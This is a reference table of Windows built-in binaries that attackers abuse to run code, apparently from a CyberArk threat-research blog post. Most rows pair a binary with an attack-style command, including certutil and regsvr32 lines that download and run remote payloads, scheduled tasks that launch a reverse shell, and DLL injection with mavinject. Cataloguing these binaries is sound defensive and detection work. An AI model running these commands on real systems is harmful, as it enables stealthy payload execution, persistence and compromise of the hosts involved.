| Executable Path | Executable Name | Executable Description | Example Command |
|---|---|---|---|
| C:\Windows\System32\; C:\Windows\SysWOW64\ | regedit.exe | Used by Windows to manipulate the registry | `regedit.exe` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | at.exe | Schedule periodic tasks | `at.exe 09:00 /interactive /every:m,t,w,th,f,s,su revshell.exe` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | reg.exe | Used to manipulate the registry | `reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | cmd.exe | The command-line interpreter in Windows | `cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | winrm.cmd | Windows Remote Management | `winrm.exe invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | winrs.exe | Windows Remote Shell | `winrs.exe /r:myserver command` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | cmstp.exe | Installs or removes a Connection Manager service profile | `cmstp.exe /s PATH_TO\shell.inf` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | Mshta.exe | Used by Windows to execute HTML applications (.hta) | `mshta.exe PATH_TO\shell.hta` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | control.exe | Binary used to launch Control Panel items in Windows | `control.exe PATH_TO\shell.dll` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | Cscript.exe | Binary used to execute scripts in Windows | `cscript.exe PATH_TO\shell.vbs` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | Wscript.exe | Used by Windows to execute scripts | `wscript.exe PATH_TO\shell.vbs` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | msiexec.exe | Used by Windows to execute MSI files | `msiexec.exe /quiet /i PATH_TO\shell.msi` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | xwizard.exe | Extensible Wizards Host Process | `xwizard.exe argument1 argument2` (loads xwizard.dll from the same folder) |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | regedt32.exe | Used by Windows to register DLLs | `regedt32.exe` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | Certutil.exe | Windows binary used for handling certificates | `certutil.exe -urlcache -split -f "http://x.x.x.x/shell.ps1" C:\Users\username\AppData\Local\Temp\shell.ps1` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | Odbcconf.exe | Used in Windows for managing ODBC connections | `odbcconf.exe -f PATH_TO\shell.rsp` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | SchTasks.exe | Schedule periodic tasks | `schtasks.exe /Create /SC HOURLY /TN RunShell /TR "shell.exe" && SCHTASKS /Run /I /TN RunShell` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | forfiles.exe | Selects and executes a command on a file or set of files; useful for batch processing | `forfiles.exe /p c:\windows\system32 /m notepad.exe /c shell.exe` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | regsvr32.exe | Used by Windows to register DLLs | `regsvr32.exe /s /n /u /i:http://example.com/file.sct PATH_TO\shell.dll` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | rundll32.exe | Used by Windows to execute DLL files | `rundll32.exe PATH_TO\shell.dll` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | ATBroker.exe | Helper binary for Assistive Technology (AT) | `ATBroker.exe /start PATH_TO\shell` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | wmic.exe | The WMI command-line (WMIC) utility provides a command-line interface for WMI | `wmic.exe process call create calc.exe` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | Mavinject.exe | Used by App-V in Windows; injects file.dll, stored as an Alternate Data Stream (ADS), into a process | `mavInject32.exe /INJECTRUNNING PATH_TO\shell.dll` |
| C:\Windows\System32\; C:\Windows\SysWOW64\ | InfDefaultInstall.exe | Binary used to perform an installation based on the contents of an INF file | `InfDefaultInstall.exe shell.inf` |
| C:\Windows\Microsoft.NET\Framework64\v2.0.50727\; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ | csc.exe | Binary used by .NET to compile C# code | `csc.exe /reference:"PATH_TO\System.Management.Automation.dll" /out:PATH_TO\pshell.dll PATH_TO\shell.cs` |
| C:\Windows\System32\WindowsPowerShell\v1.0\; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ | Powershell.exe | Task automation and configuration management framework from Microsoft | `powershell.exe -file PATH_TO\shell.ps1` |
| C:\Windows\Microsoft.NET\Framework64\v2.0.50727\; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ | Regasm.exe | Loads the target DLL file and executes the RegisterClass function | `regasm.exe /U PATH_TO\shell.dll` |
| C:\Windows\Microsoft.NET\Framework64\v2.0.50727\; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ | Regsvcs.exe | Regsvcs and Regasm are Windows command-line utilities used to register .NET Component Object Model (COM) assemblies | `regsvcs.exe /U PATH_TO\pshell.dll` |
| C:\Windows\Microsoft.NET\Framework64\v2.0.50727\; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ | msbuild.exe | Used to compile and execute code | `msbuild.exe PATH_TO\shell.csproj` |
| C:\Windows\System32\WindowsPowerShell\v1.0\; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ | Powershell_ise.exe | Windows PowerShell Integrated Scripting Environment (ISE) | `powershell_ise.exe` |
| C:\Windows\Microsoft.NET\Framework64\v2.0.50727\; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ | InstallUtil.exe | The Installer tool is a command-line utility that installs and uninstalls server resources by executing the installer components in specified assemblies | `InstallUtil.exe /logfile= /LogToConsole=false /U PATH_TO\shell.dll` |
| C:\Program Files (x86)\Microsoft SDKs\F#\4.0\Framework\v4.0\ | fsi.exe | F# Interactive (fsi.exe) is used to run F# code interactively at the console or to execute F# scripts; in other words, it runs a REPL (Read, Evaluate, Print Loop) for the F# language | `fsi.exe PATH_TO\shell.fscript` |
| C:\Program Files (x86)\Microsoft Web Tools\DNX\dnx-clr-win-x86.1.0.0-beta8\bin\; C:\Program Files (x86)\Microsoft Web Tools\DNX\dnx-coreclr-win-x64.1.0.0-beta8\bin\ | dnx.exe | The DNX Utility (dnu) tool is responsible for all operations involved with packages in your application | `dnx.exe shell` |

This is a Security Bloggers Network syndicated blog from CyberArk authored by Dan Zoen. Read the original post at: https://www.cyberark.com/threat-research-blog/table-test/